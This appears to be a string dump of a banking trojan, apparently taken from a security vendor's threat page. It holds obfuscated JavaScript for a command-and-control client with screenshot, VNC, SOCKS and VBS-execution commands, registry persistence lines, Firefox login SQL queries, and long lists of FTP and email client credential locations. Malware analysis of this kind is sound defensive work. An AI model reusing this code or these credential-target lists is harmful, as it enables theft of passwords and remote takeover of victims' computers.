a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(w(c)==\'I\'||c==s){c=p;K=\'v\'}C{c=\'1f: \' c;K=\'u\'}j i.m(K,\'6/\' t \'/\' a,c,d)};i.J=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';J=a "\\r\\n" b;j i.m(\'u\',l,J,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1r.1s;j i.m(\'u\',l,U,b)};i.1t=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1u=k(a,b){l=\'16/\';j i.m(\'u\',l,a,b)};i.1v=k(a){L=V.1w(a);L.1x.1y(L)}};',62,97,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|typeof|_LastAsync|responseText|catch|new|try|else||XMLHTTP|ActiveXObject|Async|XMLHttpRequest|undefined|Post|Type|El|Msxml2|var|GetXHR|Key|200|status||readyState|Data|document|Math|GetVal|Version|DelVal||||||||ClearVals|GetServer|random|onreadystatechange|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|SetVal|Microsoft|location|href|StopVideo|ExecVBS|Hide|getElementById|parentNode|removeChild'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
chrome.dll
127.0.0.1
DrWeb
McAfee.com
Doctor Web
Common Files\Doctor Web
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
id=%0.8X%0.8X%0.8X%0.4X%0.4X%0.4X&iv=%0.8X&av=%0.8X&uptime=%u
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s&name=%ws&domain=%ws
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsas.exe
lsm.exe
winlogon.exe
taskhost.exe
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
Shell Update Exists %s = %s
Shell Reload status = %u = %u
#cert
Del Old = %s
Del Reg = %s
Fail Save New = %u
Reg Autorun = %u = %u = %ws = %ws
Updated fail size %u != %u
Updated RSA Init fail = %u
Sign Bad = %u
Save New File = %u = %u
Update_InstallNew = %u = %u
[Pony] Fail Get Pass
Start Update: %s = %u
download status = %u =%u
Updated status = %u
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
account.cfg
account.cfn
Dir #%u
<POP3_Password2
<SMTP_Password2
<IMAP_Password2
<HTTPMail_Password2
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
Server.Pass
Server.Host
Server.User
Server.Port
Last Server Pass
Last Server Port
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Email Address
SMTP Server
SMTP User Name
HTTP User
HTTP Server URL
HTTPMail User Name
HTTPMail Server
SMTP User
POP3 Port
SMTP Port
IMAP Port
POP3 Password2
IMAP Password2
NNTP Password2
HTTPMail Password2
SMTP Password2
POP3 Password
IMAP Password
NNTP Password
HTTPMail Password
SMTP Password
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
SysShadow
Chrome_WidgetWin_1
Chrome_WidgetWin_0
d3d10_1.dll
d3d10_1core.dll
d3d10.dll
d3d10core.dll
d2d1.dll
OPENGL32.dll
d3d9.dll
d3d11.dll
Dxtrans.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegNotifyChangeKeyValue
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
NETAPI32.dll
SHDeleteKeyA
SHLWAPI.dll
DeleteUrlCacheEntry
WININET.dll
WS2_32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
ole32.dll
OLEAUT32.dll
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
HttpAddRequestHeadersA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
COMDLG32.dll
WININET.DLL
{7BD47FDD-1028-4944-A268-024C76A61BA9}
{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{4E153850-602D-4819-B83D-3CCD0A1E7351}
{1DB12055-380D-432E-9763-74AF5EF609C7}
{1DB54A51-7DD5-412D-BFAE-04066B1F7E58}
{6BDA2D4D-43CE-4CEF-B412-5DC94F387B59}
{11166F2F-6DE1-4205-8360-3AB2448931C2}
{7B4F16B2-1959-4C21-97FE-6A7768C974CF}
{433D2A25-41C1-4D21-8ED6-4EEC2CFE2DF1}
{77101F80-23B8-43A9-AE7B-5CC95982109D}
\\.\pipe\{615F04F4-5F33-42AB-BE17-250A447B0979}
D{2D14570C-0C4D-4838-A1E1-4B5F4F6A55E5}
{56E926DB-5D71-499E-8BBB-2E28568040CB}
U{4E153850-602D-4819-B83D-3CCD0A1E7351}
2FFC7DAE-2BDA-4ABF-A443-1DD264C72327
=)=2===~=
3 343=3_3
= =,=`=}=
echrome.dll
iexplore.exe
chrome.exe
\System32\KERNEL32.DLL
\System32\kernelbase.dll
\ThemeApiPort
%System%\wbem\wmiprvse.exe

Explorer.EXE_880_rwx_01E50000_00054000:

%Documents and Settings%\All Users\Application Data\DawoKamq\DawoKamq.dat
.text
`.rdata
@.data
.reloc
HHt.HHt
More information: hXXp://VVV.ibsensoftware.com/
8HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
KERNEL32.DLL
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
.rdata
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1e(i){j.P=i;j.x=s;j.19=2;j.O=l(){p(z L===\'I\'){L=l(){B{k E H("J.F.6.0")}A(e){}B{k E H("J.F.3.0")}A(e){}B{k E H("J.F")}A(e){}B{k E H("Y.F")}A(e){}k v}}k E L()};j.o=l(a,b,c,d){K f=j.O();K g=s;K h=j;G=(z(d)==\'I\')?v:q;b=\'/\' j.P \'/\' 1a.1b() \'/\' b;p(G==q){j.x=s;f.W=l(){B{p(f.Q==4){p(f.R!=T||f.y==\'-\'){h.x=v;p(z(d)=="l"){d(v)}}C{p(f.y==\' \'){h.x=q;p(z(d)=="l"){d(q)}}C{h.x=f.y;p(z(d)=="l"){d(f.y)}}}}}A(e){h.x=v;p(z(d)=="l"){d(v)}}}}f.1v(a,b,G);f.1g(c);p(G==q){k q}B{p(f.Q==4&&f.R==T){p(f.y==\'-\'){k v}C{p(f.y==\' \'){k q}C{k f.y}}}k v}A(e){k v}};j.1p=l(){k j.x};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'u\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,s,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,s,b)};j.17=l(a){m=\'4/\';k j.o(\'w\',m,s,a)};j.18=l(a,b,c){t=(b==q)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,s,c)};j.1c=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==q)?\'S\':\'D\';p(z(c)==\'I\'||c==v){c=s;N=\'w\'}C{c=\'1f: \' c;N=\'u\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==q)?\'S\':\'D\';k j.o(\'u\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,s,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'u\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,s,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'u\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'u\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'u\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'u\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,s,a)};j.1u=l(a,b){m=\'16/\';k j.o(\'u\',m,a,b)}};',62,94,'|||||||||||||||||||this|return|function|Url||Query|if|true||null||POST|false|GET|_LastAsync|responseText|typeof|catch|try|else||new|XMLHTTP|Async|ActiveXObject|undefined|Msxml2|var|XMLHttpRequest|Post|Type|GetXHR|_Key|readyState|status||200|Data|SetVal|onreadystatechange|GetVal|Microsoft|DelVal||||||||ClearVals|GetServer|Version|Math|random|PostServer|Get|EQFramework|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo|ExecVBS|open'.split('|'),0,{}));
eval('var %s '  
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=A k(){i.P=p;i.x=p;i.Y=3;i.O=k(){o(w H===\'I\'){H=k(){B{j A F("M.E.6.0")}z(e){}B{j A F("M.E.3
No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now